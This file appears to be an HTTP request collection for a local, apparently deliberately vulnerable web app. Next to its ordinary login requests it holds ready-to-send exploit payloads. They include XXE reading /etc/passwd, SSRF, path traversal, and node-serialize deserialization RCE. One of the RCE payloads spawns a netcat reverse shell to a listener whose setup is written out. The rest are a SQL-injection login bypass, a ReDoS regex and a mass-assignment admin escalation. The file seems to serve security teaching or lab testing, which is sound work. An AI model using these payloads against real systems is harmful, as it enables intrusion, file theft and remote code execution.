### GENERAL - LOGIN AS ADMIN
POST /api/sessions HTTP/1.1
Host: localhost:3002
Content-Type: application/json

{
    "username": "mario@example.org",
    "password": "password"
}

### GENERAL - LOGIN AS USER
POST /api/sessions HTTP/1.1
Host: localhost:3002
Content-Type: application/json

{
    "username": "luigi@example.org",
    "password": "password"
}

### GENERAL - LOGOUT
DELETE /api/sessions/current HTTP/1.1
Host: localhost:3002

### GENERAL - LIST PAGES
GET /api/pages HTTP/1.1
Host: localhost:3002

### GENERAL - GET PAGE 1
GET /api/pages/1 HTTP/1.1
Host: localhost:3002

### EXPLOIT CWE-611 XML External Entities - READ SERVER'S /etc/passwd
POST /api/pages HTTP/1.1
Host: localhost:3002
Content-Type: text/xml

<?xml version='1.0'?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<page title="Exploit" publicationDate="2024-01-01">
  <block type="header">Here's the server's /etc/passwd</block>
  <block type="paragraph">&xxe;</block>
</page>

### EXPLOIT CWE-918 SSRF - ACCESS IMAGE FROM AN INTERNAL SERVICE
# We suppose that there is another server active on port 8080, not accessible from the Internet
POST /api/pages HTTP/1.1
Host: localhost:3002
Content-Type: text/xml

<?xml version='1.0'?>
<page title="Exploit" author='2' publicationDate='2024-01-01'>
    <block type='header'>Save this outside the boundaries</block  >
    <!-- { "fileName": "secret", "url": "http://localhost:8080/images/secret.png" } -->
    <block type='image'>eyAiZmlsZU5hbWUiOiAic2VjcmV0IiwgInVybCI6ICJodHRwOi8vbG9jYWxob3N0OjgwODAvaW1hZ2VzL3NlY3JldC5wbmciIH0=</block>
</page>

### EXPLOIT CWE-22 Path traversal - SAVE FILE OUTSIDE BOUNDARIES
POST /api/pages HTTP/1.1
Host: localhost:3002
Content-Type: text/xml

<?xml version='1.0'?>
<page title="Exploit" author='2' publicationDate=''>
    <block type='header'>Save this outside the boundaries</block  >
    <!-- {"fileName":"../../../outside.jpg", "url": "https://t4.ftcdn.net/jpg/00/53/45/31/360_F_53453175_hVgYVz0WmvOXPd9CNzaUcwcibiGao3CL.jpg"} -->
    <block type='image'>eyJmaWxlTmFtZSI6Ii4uLy4uLy4uL291dHNpZGUuanBnIiwgInVybCI6ICJodHRwczovL3Q0LmZ0Y2RuLm5ldC9qcGcvMDAvNTMvNDUvMzEvMzYwX0ZfNTM0NTMxNzVfaFZnWVZ6MFdtdk9YUGQ5Q056YVVjd2NpYmlHYW8zQ0wuanBnIn0=</block>
</page>

### EXPLOIT CWE-502 Unsafe deserialization - SHOW CONTENTS OF ROOT FOLDER IN SERVER'S LOGS
POST /api/pages HTTP/1.1
Host: localhost:3002
Content-Type: text/xml

<?xml version='1.0'?>
<page title="Exploit" author='2' publicationDate=''>
    <block type='header'>Deserialize THIS</block>
    <!-- {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}()"} -->
    <block type='image'>eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2xzIC8nLCBmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpIHsgY29uc29sZS5sb2coc3Rkb3V0KSB9KTt9KCkifQ==</block>
</page>

### EXPLOIT CWE-502 Unsafe deserialization - SPAWN REVERSE SHELL
# The attacker's machine must have netcat listening: while true; do nc -lvp 4242; echo '\n'; done
POST /api/pages HTTP/1.1
Host: localhost:3002
Content-Type: text/xml

<?xml version='1.0'?>
<page title="Exploit" author='2' publicationDate=''>
    <block type='header'>Deserialize THIS</block>
    <!-- {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('nc -e /bin/bash 127.0.0.1 4242')}()"} -->
    <block type='image'>eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ25jIC1lIC9iaW4vYmFzaCAxMjcuMC4wLjEgNDI0MicpfSgpIn0=</block>
</page>

### EXPLOIT CWE-89 SQL Injection - LOGIN AS ADMIN
POST /api/sessions HTTP/1.1
Host: localhost:3002
Content-Type: application/json

{
    "username": "mario@example.org' --",
    "password": "UknownPassword"
    
}

### EXPLOIT CWE-1333 Regex Attack - REGISTER USING EVIL REGEX
POST /api/register HTTP/1.1
Host: localhost:3002
Content-Type: application/json

{
    "name": "^(([a-z])+.)+[A-Z]([a-z])+$",
    "username": "prova9@example.org",
    "password": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!!",
    "admin":false 
}

### EXPLOIT CWE-915 Mass assignment - Registration of a malicious user with administrator privileges.
POST /api/register HTTP/1.1
Host: localhost:3002
Content-Type: application/json

{
    "name": "test",
    "username": "test@example.org",
    "password": "password",
    "admin":true 
}